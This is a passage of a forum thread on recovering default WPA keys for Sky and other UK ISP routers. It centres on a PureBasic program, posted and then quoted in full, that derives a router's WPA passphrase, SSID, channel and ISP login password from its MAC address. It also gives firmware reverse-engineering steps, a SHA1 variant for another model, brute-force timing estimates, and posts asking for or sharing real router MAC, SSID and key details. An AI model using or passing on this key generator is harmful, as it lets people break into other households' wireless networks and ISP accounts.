Page 3 of 7 FirstFirst 12345 ... LastLast
Results 21 to 30 of 61

Thread: default WPA keys!!!

  1. #21
    Member
    Join Date
    Jun 2008
    Posts
    50

    Default

    [QUOTE=Anti-NewWorldOrder;117115]You know the guy who owns http://www.cm9.net ?

    james at sky talk website.

    Well he already knows how to crack v2 boxes, he found his answer within the firmware of the v2 boxes. He created the website instead of distributing an executable file as the executable file would hold the answer to your very question.

    I have already posted somewhere the V1 algorithm, the V2 routers I understand use the same algorithm but with the serial key from the router used at "some" point. (you can see this by viewing the requested info required on the cm9 website) Not tested the algorithm but someone with a V2 router can test.

    A slightly seperate question, how many combinations of default codes are there using only capital letters, the revisit to this is following BT4 with Nvidia enhancements, is this not feasible now?

  2. #22
    Just burned his ISO
    Join Date
    May 2008
    Posts
    6

    Default

    Quote Originally Posted by letmein View Post
    A slightly seperate question, how many combinations of default codes are there using only capital letters, the revisit to this is following BT4 with Nvidia enhancements, is this not feasible now?
    26^8 = 208827064576 possible combinations.

    Nvidia GTX280 @ 10,000 keys/sec = ~241 days run time.

    Although if you're lucky you find the key in the first half of the key space.

  3. #23
    Just burned his ISO
    Join Date
    Mar 2009
    Posts
    8

    Default

    Hi, first post (hi folks!) - norm360 - If you still have the router with those details on, how is that serial formatted, please? (Meaning, is any in brackets, spaces, dashes). Thanks!

  4. #24
    Just burned his ISO
    Join Date
    Mar 2009
    Posts
    8

    Default

    This is the messy source code to a Purebasic program I've written for the DG834GT model. Can't add a URL for the .exe here yet as I haven't made enough posts.

    Code:
    ; SKY DG834GT decoder v1.0
    ; 6th May 2009
    ;
    ; Ref: (no url yet)
    
    ; Please note that the following is sloppy coding, my brain is fried. I didn't actually
    ; achieve any result by viewing the MIPS assembler functions of the router binaries, but this is 
    ; where I started: I have Ubuntu installed and the QEMU emulator, running MIPS (Debian)
    ; Snip (no url yet)
    ; (The Debian Etch MIPS small) - rest of the instructions are on that page.
    ;
    ; Once up And running I install GDB And place the SKY router binary 'RC' (usr/sbin/rc) on a webserver
    ; where I can 'wget' it To the emulated MIPS environment. The binaries for the router can be found
    ; here: (snip)
    ; The file you're after is: DG834GT-1SKUK (For Firmware Version 1.02.28) - within that archive
    ; is target.tar.bz2 - unpack that and you'll find the RC binary.
    ;
    ; You'll also have to copy some libs over from that target archive to your /lib/ directory...
    ;   ld-uClibc-0.9.28.so
    ;   ld-uClibc.so.0
    ;   libc.so.0
    ;   libuClibc-0.9.28.so
    ; else the RC binary will appear to not function. 
    ; Make sure to CHMOD 777 the libs and RC binary.
    ;
    ; After failing badly to understand any of the code of RC using GDB,
    ; I found another way. In the QEMU emulator I renamed my MD5SUM to MD5SUM2, then copied
    ; my 'more' command to 'MD5SUM' (find them using the 'whereis' command). Effectively, this lets
    ; GDB run the RC file without creating an MD5SUM. You create it yourself. It still calls MD5SUM, but
    ; doesn't realise it's calling 'more' instead. So what it's doing it echoing your personalised MAC
    ; file to itself and creating the password/phrase/etc into the newly created nvram file. With this 
    ; method you can trial and error to find algorithm combinations.
    ; 
    ; GDB: shell echo -n 00000000000000000000000000000000 >mac
    ; GDB: file rc
    ; GDB: start
    ; GDB  jump EzPassword
    ; GDB: shell more nvram
    ; 
    ; To get this to work correctly you have to type 'start' in GDB before every attempt. Values for
    ; nvram include: EzPassword, EzSSID, EzChannel, EzPassphrase (all of which can be jumped to, see above)
    ;
    ; Purebasic source requires Droopy Library for hex2dec function
    ; Window functions derived from public domain source by 'Kale'.
    
    ; DG934G v2 SKY router uses the serial on the router itself,
    ; which is added To the tmp/mac file As: 1a1b1c2a2d2f-12345678...
    ; (I think!) - trying this out on norm360's data brings the correct
    ; password etc but not the correct Passphrase. Working on it.
    ; Ref: (snip)
    
    ; Haven't looked at the v3 router yet.
    
    ; I think this is all right, my brain is mince, as I said.
    
    ; The following is to set the window/button setup
    ; which I can't explain well, since I took and modified the code
    ; from public domain archives
    
    #Window_0 = 0 
    #Window_1 = 1 
    
    #Gadget_0 = 0 
    #Gadget_1 = 1 
    #Gadget_2 = 2 
    #Gadget_3 = 3
    #Gadget_4 = 4
    #Gadget_5 = 5
    #Gadget_6 = 6
    #Gadget_7 = 7
    
    Procedure AddText() 
        existingText.s = GetGadgetText(#Gadget_0) 
        If existingText = "" 
            SetGadgetText(#Gadget_0, GetGadgetText(#Gadget_1)) 
        Else 
            SetGadgetText(#Gadget_0, existingText + Chr(13) + Chr(10) + GetGadgetText(#Gadget_1)) 
        EndIf 
        lines = SendMessage_(GadgetID(0),#EM_GETLINECOUNT,0,0) 
        SendMessage_(GadgetID(#Gadget_0), #EM_LINESCROLL, 0, lines) 
    EndProcedure 
    
      If OpenWindow(#Window_0, 5, 5, 690, 300, "Sky v1.0 - DG834GT",  #PB_Window_MinimizeGadget | #PB_Window_MaximizeGadget | #PB_Window_SystemMenu |  #PB_Window_ScreenCentered ) 
        If CreateGadgetList(WindowID(#Window_0)) 
          EditorGadget(#Gadget_0, 5, 5, 680, 254, #ES_MULTILINE  |  #ES_AUTOVSCROLL | #ES_AUTOHSCROLL | #WS_VSCROLL ) 
          StringGadget(#Gadget_1, 5, 270, 250, 21, "") 
          ButtonGadget(#Gadget_2, 270, 270, 65, 22, "Go") 
          ButtonGadget(#Gadget_3, 340, 270, 65, 22, "Info")
          ButtonGadget(#Gadget_4, 410, 270, 65, 22, "Null1")
          ButtonGadget(#Gadget_5, 480, 270, 65, 22, "Null2")
          ButtonGadget(#Gadget_6, 550, 270, 65, 22, "Null3")
          ButtonGadget(#Gadget_7, 620, 270, 65, 22, "Null4")
          
        EndIf 
      EndIf 
    
    Repeat 
      Event = WaitWindowEvent() 
      Select Event 
        Case #PB_Event_Gadget 
        Select EventGadget() 
            
        ; Button Go is pressed    
        Case #Gadget_2 
        If GetGadgetText(#Gadget_1) <> ""
        mac$=GetGadgetText(#Gadget_1)
        Gosub pro
        EndIf 
        SetGadgetText(#Gadget_0,"")
        SetGadgetText(#Gadget_0,all$)
        SetGadgetText(#Gadget_1,"")
        
        ; Button Read Me is pressed
        Case #Gadget_3
        mystring.s = PeekS(? source) 
        SetGadgetText(0, mystring.s)
       
        EndSelect 
      EndSelect 
    
    Until Event = #PB_Event_CloseWindow 
    End
    
    pro:; Main routine to grab everything from the hash
    
    ; Uppercases your mac and removes the : colons if entered
    ; No other checks on the mac are done in this version
    mac$=UCase(RemoveString(mac$,":"))
    
    ; Purebasic inbuilt md5sum routine
    ; If doing an MD5SUM in Linux, create your /tmp/mac file with
    ; echo -n 1a2b3c4d5e6f >mac - Make sure to use the n flag
    hash$=MD5Fingerprint(@mac$, Len(mac$))
    
    ; This takes 5 double-char hex characters from the MAC
    ; starting with position 1 - example (MD5SUM for 112233445566):
    ; eb341820cd3a3485461a61b1e97d31b1 - split this to
    ; eb 34 18 20 cd
    ; Then split from position 15, 10 characters again:
    ; 85 46 1a 61 b1
    ; I then converted the first five to decimal, then
    ; the second five and added eb + 85, 34 + 46, etc
    ; Converted them back to hex and then converting again to 2-digit hex
    ; (first sum of eb + 85 = 170, so becomes 70)
    ; Place all of your 5 sums together in one line to
    ; create the password:
    ; 70 7a 32 81 7e -> 707a32817e
    ; I did try adding eb341820cd + 85461a61b1 but the result
    ; was wrong, maybe it was my math, or the routine, or maybe
    ; it just can't be done that way, I don't know.
    a1=Hex2Dec(Mid(hash$,1,2))
    a2=Hex2Dec(Mid(hash$,3,2))
    a3=Hex2Dec(Mid(hash$,5,2))
    a4=Hex2Dec(Mid(hash$,7,2))
    a5=Hex2Dec(Mid(hash$,9,2))
    
    b1=Hex2Dec(Mid(hash$,15,2))
    b2=Hex2Dec(Mid(hash$,17,2))
    b3=Hex2Dec(Mid(hash$,19,2))
    b4=Hex2Dec(Mid(hash$,21,2))
    b5=Hex2Dec(Mid(hash$,23,2))
    
    sum1$=Right(Hex(a1+b1),2)
    sum2$=Right(Hex(a2+b2),2)
    sum3$=Right(Hex(a3+b3),2)
    sum4$=Right(Hex(a4+b4),2)
    sum5$=Right(Hex(a5+b5),2)
    
    password$=LCase(sum1$+sum2$+sum3$+sum4$+sum5$+sum6$)
    
    ; The following creates an array for easy lookup of the Passphrase.
    ; 00 = A, 01 = B, 02 = C, etc until Z is reached, 
    ; then we kick back to A: 19 = Z, 1a = A, 1b = B
    ; The 8 hex values for the Passphrase can be found in the hash
    ; at these locations:
    ; Position 3,7,11,15,19,23,27,31 - an example using 1's and 0's,
    ; where the 1's are the Passphrase hex values:
    ; 00110011001100110011001100110011
    ; So if the above MD5SUM = 00990011001100110011001100110011
    ; Then via the array-lookup, the Passphrase is:XRRRRRRR
    ; X=99, R=11
    Dim phrasearray.s(255)
    a=65
    For i = 0 To 255
    letter$=Chr(a)
    find$=LCase(RSet(Hex(i),2,"0"))+" "+letter$
    phrasearray(i)=find$
    a=a+1
    If a=91 : a=65 :EndIf
    Next
    
    p1=Hex2Dec(Mid(hash$,3,2))
    phrase$+Mid(phrasearray(p1),4,1)
    p2=Hex2Dec(Mid(hash$,7,2))
    phrase$+Mid(phrasearray(p2),4,1)
    p3=Hex2Dec(Mid(hash$,11,2))
    phrase$+Mid(phrasearray(p3),4,1)
    p4=Hex2Dec(Mid(hash$,15,2))
    phrase$+Mid(phrasearray(p4),4,1)
    p5=Hex2Dec(Mid(hash$,19,2))
    phrase$+Mid(phrasearray(p5),4,1)
    p6=Hex2Dec(Mid(hash$,23,2))
    phrase$+Mid(phrasearray(p6),4,1)
    p7=Hex2Dec(Mid(hash$,27,2))
    phrase$+Mid(phrasearray(p7),4,1)
    p8=Hex2Dec(Mid(hash$,31,2))
    phrase$+Mid(phrasearray(p8),4,1)
    
    ; The SSID array is created as above, where
    ; a hex value of 00=0 and 09=9. When it reaches 9
    ; the array kicks back To 0, so 0a = 0
    ; The hex positions in the MD5SUM are found 
    ; at 23,25,27,29,31
    ; Example: 0102031a1b = 12367
     
    Dim ssidarray.s(255)
    a=48
    For i = 0 To 255
    digit$=Chr(a)
    find$=LCase(RSet(Hex(i),2,"0"))+" "+digit$
    ssidarray(i)=find$
    a=a+1
    If a=58 : a=48 :EndIf
    Next
    
    
    s1=Hex2Dec(Mid(hash$,23,2))
    ssid$+Mid(ssidarray(s1),4,1)
    s2=Hex2Dec(Mid(hash$,25,2))
    ssid$+Mid(ssidarray(s2),4,1)
    s3=Hex2Dec(Mid(hash$,27,2))
    ssid$+Mid(ssidarray(s3),4,1)
    s4=Hex2Dec(Mid(hash$,29,2))
    ssid$+Mid(ssidarray(s4),4,1)
    s5=Hex2Dec(Mid(hash$,31,2))
    ssid$+Mid(ssidarray(s5),4,1)
    
    ; Channel array same as above, but it appears
    ; they only use channels 1,6 and 11 - so the array
    ; creates 00=1, 01=6, 02=11, 03 =1, 04=6, etc.
    ; Channel hex in the MD5SUM is found at position 31 (last two
    ; characters of the MD5SUM)
    Dim channelarray.s(255)
    a=1
    For i = 0 To 255
    find$=LCase(RSet(Hex(i),2,"0"))+" "+Str(a)
    channelarray(i)=find$
    a=a+5
    If a>12 : a=1 :EndIf
    Next
    
    s1=Hex2Dec(Mid(hash$,31,2))
    channel$+Mid(channelarray(s1),4,1)
    
    ;Dump them all into variables
    x$=Chr(13)+Chr(10)
    a$="MD5SUM: "+hash$ 
    b$="Username: "+mac$+"@skydsl"
    c$="Password: "+password$
    d$="Passphrase: "+phrase$
    e$="SSID: SKY"+ssid$
    f$="Channel: "+channel$
    
    ; Dump all of the above into a shorter single line with breaks
    all$= a$+x$+b$+x$+c$+x$+d$+x$+e$+x$+f$
    
    ; Reset some stuff
    hash$=""
    mac$=""
    password$=""
    phrase$=""
    channel$=""
    ssid$=""
    find$=""
     
    Return
    ; Includes this source file into the Purebasic executable
    DataSection 
      source : IncludeBinary "source.txt" + Chr(0)
      phrasearray : IncludeBinary "phrasearray.txt" + Chr(0)
      ssidarray : IncludeBinary "ssidarray.txt" + Chr(0)
      channelarray : IncludeBinary "channelarray.txt" + Chr(0)
    EndDataSection
    It seems that the DG934 passphrase is created using the same method, but SHA1SUM instead of MD5SUM (SHA1 = 40 char string, same algo as before).

    (norm360's stuff...SHA1SUM of his MAC and Serial ( 001B2F700AE6-1NJ278 315270 ))

    Code:
    F6 F5 C3 02 56 8E DA 0C 14 10 BA 48 55 B0 81 B8 65 31 80 16
       ^^    ^^    ^^    ^^    ^^    ^^    ^^    ^^  
    LCMMQUUC
    
    00 = A, 01 = B, etc.
    
    F5 L
    02 C
    8E M
    0C M
    10 Q
    48 U
    B0 U
    B8 C
    SSID, Password, Channel, same as the DG834GT.
    Seems right, I'll have to quadruple check everything soon.

  5. #25
    Just burned his ISO
    Join Date
    Dec 2006
    Posts
    7

    Default

    Quote Originally Posted by chaeo View Post
    This is the messy source code to a Purebasic program I've written for the DG834GT model. Can't add a URL for the .exe here yet as I haven't made enough posts.

    Code:
    ; SKY DG834GT decoder v1.0
    ; 6th May 2009
    ;
    ; Ref: (no url yet)
    
    ; Please note that the following is sloppy coding, my brain is fried. I didn't actually
    ; achieve any result by viewing the MIPS assembler functions of the router binaries, but this is 
    ; where I started: I have Ubuntu installed and the QEMU emulator, running MIPS (Debian)
    ; Snip (no url yet)
    ; (The Debian Etch MIPS small) - rest of the instructions are on that page.
    ;
    ; Once up And running I install GDB And place the SKY router binary 'RC' (usr/sbin/rc) on a webserver
    ; where I can 'wget' it To the emulated MIPS environment. The binaries for the router can be found
    ; here: (snip)
    ; The file you're after is: DG834GT-1SKUK (For Firmware Version 1.02.28) - within that archive
    ; is target.tar.bz2 - unpack that and you'll find the RC binary.
    ;
    ; You'll also have to copy some libs over from that target archive to your /lib/ directory...
    ;   ld-uClibc-0.9.28.so
    ;   ld-uClibc.so.0
    ;   libc.so.0
    ;   libuClibc-0.9.28.so
    ; else the RC binary will appear to not function. 
    ; Make sure to CHMOD 777 the libs and RC binary.
    ;
    ; After failing badly to understand any of the code of RC using GDB,
    ; I found another way. In the QEMU emulator I renamed my MD5SUM to MD5SUM2, then copied
    ; my 'more' command to 'MD5SUM' (find them using the 'whereis' command). Effectively, this lets
    ; GDB run the RC file without creating an MD5SUM. You create it yourself. It still calls MD5SUM, but
    ; doesn't realise it's calling 'more' instead. So what it's doing it echoing your personalised MAC
    ; file to itself and creating the password/phrase/etc into the newly created nvram file. With this 
    ; method you can trial and error to find algorithm combinations.
    ; 
    ; GDB: shell echo -n 00000000000000000000000000000000 >mac
    ; GDB: file rc
    ; GDB: start
    ; GDB  jump EzPassword
    ; GDB: shell more nvram
    ; 
    ; To get this to work correctly you have to type 'start' in GDB before every attempt. Values for
    ; nvram include: EzPassword, EzSSID, EzChannel, EzPassphrase (all of which can be jumped to, see above)
    ;
    ; Purebasic source requires Droopy Library for hex2dec function
    ; Window functions derived from public domain source by 'Kale'.
    
    ; DG934G v2 SKY router uses the serial on the router itself,
    ; which is added To the tmp/mac file As: 1a1b1c2a2d2f-12345678...
    ; (I think!) - trying this out on norm360's data brings the correct
    ; password etc but not the correct Passphrase. Working on it.
    ; Ref: (snip)
    
    ; Haven't looked at the v3 router yet.
    
    ; I think this is all right, my brain is mince, as I said.
    
    ; The following is to set the window/button setup
    ; which I can't explain well, since I took and modified the code
    ; from public domain archives
    
    #Window_0 = 0 
    #Window_1 = 1 
    
    #Gadget_0 = 0 
    #Gadget_1 = 1 
    #Gadget_2 = 2 
    #Gadget_3 = 3
    #Gadget_4 = 4
    #Gadget_5 = 5
    #Gadget_6 = 6
    #Gadget_7 = 7
    
    Procedure AddText() 
        existingText.s = GetGadgetText(#Gadget_0) 
        If existingText = "" 
            SetGadgetText(#Gadget_0, GetGadgetText(#Gadget_1)) 
        Else 
            SetGadgetText(#Gadget_0, existingText + Chr(13) + Chr(10) + GetGadgetText(#Gadget_1)) 
        EndIf 
        lines = SendMessage_(GadgetID(0),#EM_GETLINECOUNT,0,0) 
        SendMessage_(GadgetID(#Gadget_0), #EM_LINESCROLL, 0, lines) 
    EndProcedure 
    
      If OpenWindow(#Window_0, 5, 5, 690, 300, "Sky v1.0 - DG834GT",  #PB_Window_MinimizeGadget | #PB_Window_MaximizeGadget | #PB_Window_SystemMenu |  #PB_Window_ScreenCentered ) 
        If CreateGadgetList(WindowID(#Window_0)) 
          EditorGadget(#Gadget_0, 5, 5, 680, 254, #ES_MULTILINE  |  #ES_AUTOVSCROLL | #ES_AUTOHSCROLL | #WS_VSCROLL ) 
          StringGadget(#Gadget_1, 5, 270, 250, 21, "") 
          ButtonGadget(#Gadget_2, 270, 270, 65, 22, "Go") 
          ButtonGadget(#Gadget_3, 340, 270, 65, 22, "Info")
          ButtonGadget(#Gadget_4, 410, 270, 65, 22, "Null1")
          ButtonGadget(#Gadget_5, 480, 270, 65, 22, "Null2")
          ButtonGadget(#Gadget_6, 550, 270, 65, 22, "Null3")
          ButtonGadget(#Gadget_7, 620, 270, 65, 22, "Null4")
          
        EndIf 
      EndIf 
    
    Repeat 
      Event = WaitWindowEvent() 
      Select Event 
        Case #PB_Event_Gadget 
        Select EventGadget() 
            
        ; Button Go is pressed    
        Case #Gadget_2 
        If GetGadgetText(#Gadget_1) <> ""
        mac$=GetGadgetText(#Gadget_1)
        Gosub pro
        EndIf 
        SetGadgetText(#Gadget_0,"")
        SetGadgetText(#Gadget_0,all$)
        SetGadgetText(#Gadget_1,"")
        
        ; Button Read Me is pressed
        Case #Gadget_3
        mystring.s = PeekS(? source) 
        SetGadgetText(0, mystring.s)
       
        EndSelect 
      EndSelect 
    
    Until Event = #PB_Event_CloseWindow 
    End
    
    pro:; Main routine to grab everything from the hash
    
    ; Uppercases your mac and removes the : colons if entered
    ; No other checks on the mac are done in this version
    mac$=UCase(RemoveString(mac$,":"))
    
    ; Purebasic inbuilt md5sum routine
    ; If doing an MD5SUM in Linux, create your /tmp/mac file with
    ; echo -n 1a2b3c4d5e6f >mac - Make sure to use the n flag
    hash$=MD5Fingerprint(@mac$, Len(mac$))
    
    ; This takes 5 double-char hex characters from the MAC
    ; starting with position 1 - example (MD5SUM for 112233445566):
    ; eb341820cd3a3485461a61b1e97d31b1 - split this to
    ; eb 34 18 20 cd
    ; Then split from position 15, 10 characters again:
    ; 85 46 1a 61 b1
    ; I then converted the first five to decimal, then
    ; the second five and added eb + 85, 34 + 46, etc
    ; Converted them back to hex and then converting again to 2-digit hex
    ; (first sum of eb + 85 = 170, so becomes 70)
    ; Place all of your 5 sums together in one line to
    ; create the password:
    ; 70 7a 32 81 7e -> 707a32817e
    ; I did try adding eb341820cd + 85461a61b1 but the result
    ; was wrong, maybe it was my math, or the routine, or maybe
    ; it just can't be done that way, I don't know.
    a1=Hex2Dec(Mid(hash$,1,2))
    a2=Hex2Dec(Mid(hash$,3,2))
    a3=Hex2Dec(Mid(hash$,5,2))
    a4=Hex2Dec(Mid(hash$,7,2))
    a5=Hex2Dec(Mid(hash$,9,2))
    
    b1=Hex2Dec(Mid(hash$,15,2))
    b2=Hex2Dec(Mid(hash$,17,2))
    b3=Hex2Dec(Mid(hash$,19,2))
    b4=Hex2Dec(Mid(hash$,21,2))
    b5=Hex2Dec(Mid(hash$,23,2))
    
    sum1$=Right(Hex(a1+b1),2)
    sum2$=Right(Hex(a2+b2),2)
    sum3$=Right(Hex(a3+b3),2)
    sum4$=Right(Hex(a4+b4),2)
    sum5$=Right(Hex(a5+b5),2)
    
    password$=LCase(sum1$+sum2$+sum3$+sum4$+sum5$+sum6$)
    
    ; The following creates an array for easy lookup of the Passphrase.
    ; 00 = A, 01 = B, 02 = C, etc until Z is reached, 
    ; then we kick back to A: 19 = Z, 1a = A, 1b = B
    ; The 8 hex values for the Passphrase can be found in the hash
    ; at these locations:
    ; Position 3,7,11,15,19,23,27,31 - an example using 1's and 0's,
    ; where the 1's are the Passphrase hex values:
    ; 00110011001100110011001100110011
    ; So if the above MD5SUM = 00990011001100110011001100110011
    ; Then via the array-lookup, the Passphrase is:XRRRRRRR
    ; X=99, R=11
    Dim phrasearray.s(255)
    a=65
    For i = 0 To 255
    letter$=Chr(a)
    find$=LCase(RSet(Hex(i),2,"0"))+" "+letter$
    phrasearray(i)=find$
    a=a+1
    If a=91 : a=65 :EndIf
    Next
    
    p1=Hex2Dec(Mid(hash$,3,2))
    phrase$+Mid(phrasearray(p1),4,1)
    p2=Hex2Dec(Mid(hash$,7,2))
    phrase$+Mid(phrasearray(p2),4,1)
    p3=Hex2Dec(Mid(hash$,11,2))
    phrase$+Mid(phrasearray(p3),4,1)
    p4=Hex2Dec(Mid(hash$,15,2))
    phrase$+Mid(phrasearray(p4),4,1)
    p5=Hex2Dec(Mid(hash$,19,2))
    phrase$+Mid(phrasearray(p5),4,1)
    p6=Hex2Dec(Mid(hash$,23,2))
    phrase$+Mid(phrasearray(p6),4,1)
    p7=Hex2Dec(Mid(hash$,27,2))
    phrase$+Mid(phrasearray(p7),4,1)
    p8=Hex2Dec(Mid(hash$,31,2))
    phrase$+Mid(phrasearray(p8),4,1)
    
    ; The SSID array is created as above, where
    ; a hex value of 00=0 and 09=9. When it reaches 9
    ; the array kicks back To 0, so 0a = 0
    ; The hex positions in the MD5SUM are found 
    ; at 23,25,27,29,31
    ; Example: 0102031a1b = 12367
     
    Dim ssidarray.s(255)
    a=48
    For i = 0 To 255
    digit$=Chr(a)
    find$=LCase(RSet(Hex(i),2,"0"))+" "+digit$
    ssidarray(i)=find$
    a=a+1
    If a=58 : a=48 :EndIf
    Next
    
    
    s1=Hex2Dec(Mid(hash$,23,2))
    ssid$+Mid(ssidarray(s1),4,1)
    s2=Hex2Dec(Mid(hash$,25,2))
    ssid$+Mid(ssidarray(s2),4,1)
    s3=Hex2Dec(Mid(hash$,27,2))
    ssid$+Mid(ssidarray(s3),4,1)
    s4=Hex2Dec(Mid(hash$,29,2))
    ssid$+Mid(ssidarray(s4),4,1)
    s5=Hex2Dec(Mid(hash$,31,2))
    ssid$+Mid(ssidarray(s5),4,1)
    
    ; Channel array same as above, but it appears
    ; they only use channels 1,6 and 11 - so the array
    ; creates 00=1, 01=6, 02=11, 03 =1, 04=6, etc.
    ; Channel hex in the MD5SUM is found at position 31 (last two
    ; characters of the MD5SUM)
    Dim channelarray.s(255)
    a=1
    For i = 0 To 255
    find$=LCase(RSet(Hex(i),2,"0"))+" "+Str(a)
    channelarray(i)=find$
    a=a+5
    If a>12 : a=1 :EndIf
    Next
    
    s1=Hex2Dec(Mid(hash$,31,2))
    channel$+Mid(channelarray(s1),4,1)
    
    ;Dump them all into variables
    x$=Chr(13)+Chr(10)
    a$="MD5SUM: "+hash$ 
    b$="Username: "+mac$+"@skydsl"
    c$="Password: "+password$
    d$="Passphrase: "+phrase$
    e$="SSID: SKY"+ssid$
    f$="Channel: "+channel$
    
    ; Dump all of the above into a shorter single line with breaks
    all$= a$+x$+b$+x$+c$+x$+d$+x$+e$+x$+f$
    
    ; Reset some stuff
    hash$=""
    mac$=""
    password$=""
    phrase$=""
    channel$=""
    ssid$=""
    find$=""
     
    Return
    ; Includes this source file into the Purebasic executable
    DataSection 
      source : IncludeBinary "source.txt" + Chr(0)
      phrasearray : IncludeBinary "phrasearray.txt" + Chr(0)
      ssidarray : IncludeBinary "ssidarray.txt" + Chr(0)
      channelarray : IncludeBinary "channelarray.txt" + Chr(0)
    EndDataSection
    any chance of a windows exe of this it would be great

  6. #26
    Just burned his ISO
    Join Date
    Mar 2009
    Posts
    8

    Default

    I've pm'd you with a link to a work-in-progress, still can't post links here.

  7. #27
    Just burned his ISO thecheekymonkey's Avatar
    Join Date
    Jan 2010
    Posts
    16

    Default

    Quote Originally Posted by Barry View Post

    hxxp://wwwDOTrouterpasswords.com/index.asp

    just that single link will save me hours lol, suprising how many times you see stuff, but dont actuall see stuff .


    cheers


    to the the op, i have a few of the details your after, i will pm them when i get back tonight.

  8. #28
    Just burned his ISO
    Join Date
    Dec 2006
    Posts
    7

    Default

    any more updates on this

    i have a sagem sky router

    MAC 00:1E:74:0F:37:CA

    SSID SKY14282

    KEY IWLHTJRV

  9. #29
    Junior Member imported_etech9's Avatar
    Join Date
    Aug 2008
    Posts
    48

    Default

    any1 got any talktalk keys?
    BIG BROTHER IS WATCHING YOU!!!

  10. #30
    Junior Member
    Join Date
    Aug 2009
    Posts
    34

    Default

    Is anyone still working on this? I have an orange live box and access to 2 sky routers! Would be awesome if any recent finds could be posted. If anyone needs the livebox or sky details, feel free to PM me!

Page 3 of 7 FirstFirst 12345 ... LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •